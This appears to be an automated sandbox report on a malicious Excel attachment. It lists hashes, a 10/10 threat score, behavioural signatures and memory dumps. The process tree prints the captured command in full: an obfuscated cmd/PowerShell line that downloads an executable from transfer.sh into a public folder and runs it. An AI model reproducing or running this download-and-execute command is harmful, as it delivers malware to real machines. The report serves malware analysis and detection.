Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    14-09-2023 15:17

General

  • Target

    Romania_Request_Imun_SRL_09_2023.xls

  • Size

    100KB

  • MD5

    968a96fab78010b987e7a0b8624d2605

  • SHA1

    1e42b6186f040b9868a978450fde05e39a267bf3

  • SHA256

    63e7d413f4653c4b84c8e4c1c4fd4516a245464b3e996aa733ce21c9c1c964b1

  • SHA512

    f953916293565e59e94f2671ef4798eff19d7ff965570d66682c38aeca273331735b638b03653960838bbfac15333364dbfb477135d298d25690b8a95fb65a75

  • SSDEEP

    3072:irxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAftJE2zuxq+fr9wBLa71ba2ryLTHeYB:kxEtjPOtioVjDGUU1qfDlavx+W2QnAVF

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Romania_Request_Imun_SRL_09_2023.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1672
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/gj04sqKk7O/boat.e^xe -o C:\Users\Public\iq5kz.exe;C:\Users\Public\iq5kz.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2592
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/gj04sqKk7O/boat.exe -o C:\Users\Public\iq5kz.exe;C:\Users\Public\iq5kz.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1696

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1672-11-0x000000007239D000-0x00000000723A8000-memory.dmp
    Filesize

    44KB

  • memory/1672-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1672-2-0x0000000000480000-0x0000000000580000-memory.dmp
    Filesize

    1024KB

  • memory/1672-3-0x0000000000480000-0x0000000000580000-memory.dmp
    Filesize

    1024KB

  • memory/1672-4-0x0000000000480000-0x0000000000580000-memory.dmp
    Filesize

    1024KB

  • memory/1672-15-0x000000007239D000-0x00000000723A8000-memory.dmp
    Filesize

    44KB

  • memory/1672-1-0x000000007239D000-0x00000000723A8000-memory.dmp
    Filesize

    44KB

  • memory/1672-14-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1672-13-0x0000000000480000-0x0000000000580000-memory.dmp
    Filesize

    1024KB

  • memory/1696-9-0x00000000023A0000-0x00000000023E0000-memory.dmp
    Filesize

    256KB

  • memory/1696-10-0x00000000023A0000-0x00000000023E0000-memory.dmp
    Filesize

    256KB

  • memory/1696-12-0x000000006BE50000-0x000000006C3FB000-memory.dmp
    Filesize

    5.7MB

  • memory/1696-8-0x000000006BE50000-0x000000006C3FB000-memory.dmp
    Filesize

    5.7MB

  • memory/1696-7-0x000000006BE50000-0x000000006C3FB000-memory.dmp
    Filesize

    5.7MB